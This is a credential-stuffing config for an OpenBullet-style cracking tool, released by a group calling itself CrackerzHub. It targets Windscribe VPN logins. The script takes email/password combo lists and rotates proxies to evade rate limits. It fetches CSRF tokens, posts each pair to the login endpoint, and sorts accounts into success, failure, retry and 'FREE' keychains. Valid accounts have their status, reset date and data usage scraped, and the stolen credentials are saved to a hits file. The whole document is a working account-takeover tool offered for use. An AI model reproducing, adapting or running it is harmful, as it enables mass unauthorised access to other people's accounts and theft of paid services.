[SETTINGS]
{
  "Name": "Windscribe VPN [@CrackerzHub]",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-15T13:30:54.7861254+05:30",
  "AdditionalInfo": "Join @CrackerzHub || Network @z3Ro23",
  "RequiredPlugins": [],
  "Author": "DoMiNiC",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Windscribe VPN - (@CrackerzHub)",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Rep FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "U" 

#UA FUNCTION GetRandomUA -> VAR "UA" 

#GetCsrf REQUEST POST "https://res.windscribe.com/res/logintoken" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.windscribe.com" 
  HEADER "Referer: https://www.windscribe.com/login" 
  HEADER "User-Agent: <UA>" 

#Csrf PARSE "<SOURCE>" JSON "csrf_token" -> VAR "csrf" 

#Time PARSE "<SOURCE>" JSON "csrf_time" -> VAR "time" 

#Login REQUEST POST "https://windscribe.com/login" 
  CONTENT "login=1&upgrade=0&csrf_time=<time>&csrf_token=<csrf>&username=<U>&password=<PASS>&code=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "authority: windscribe.com" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-language: en-US,en;q=0.9,hi;q=0.8" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://windscribe.com" 
  HEADER "referer: https://windscribe.com/login" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: <UA>" 

#Mic_Check KEYCHECK 
  KEYCHAIN Retry OR 
    KEY "Invalid CSRF Token" 
    KEY "Login attempt limit reached. Try again in a few minutes" 
  KEYCHAIN Failure OR 
    KEY "Login is not correct. Try again." 
  KEYCHAIN Success OR 
    KEY "<h2>Username</h2>" 

#Account_Status PARSE "<SOURCE>" CSS "#ma_account_status > strong" "innerHTML" CreateEmpty=FALSE -> CAP "Account Status" 

#Next_Reset PARSE "<SOURCE>" CSS "#myaccountpage > div:nth-child(6) > span" "innerHTML" CreateEmpty=FALSE -> CAP "Next Reset" 

#Data_Used PARSE "<SOURCE>" CSS "#myaccountpage > div:nth-child(7) > span" "innerHTML" CreateEmpty=FALSE -> CAP "Data Used" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Account Status>" DoesNotContain "Pro" 

#Credits FUNCTION Constant "@XxDoMiNiCxX 🔥" -> CAP "Config By" 

#HiTSaveR UTILITY File "Windscribe[PRO].txt" AppendLines "<<<<< Account HiT >>>>>\\n\\nEmail : <USER>\\nPass : <PASS>\\n\\n<<<<< Info >>>>>\\n\\nUsername : <U>\\nAccount Status : <Account Status>\\nExpiry Date : <Next Reset>\\nData Used : <Data Used>\\n\\n" -> VAR "Windscribe" 

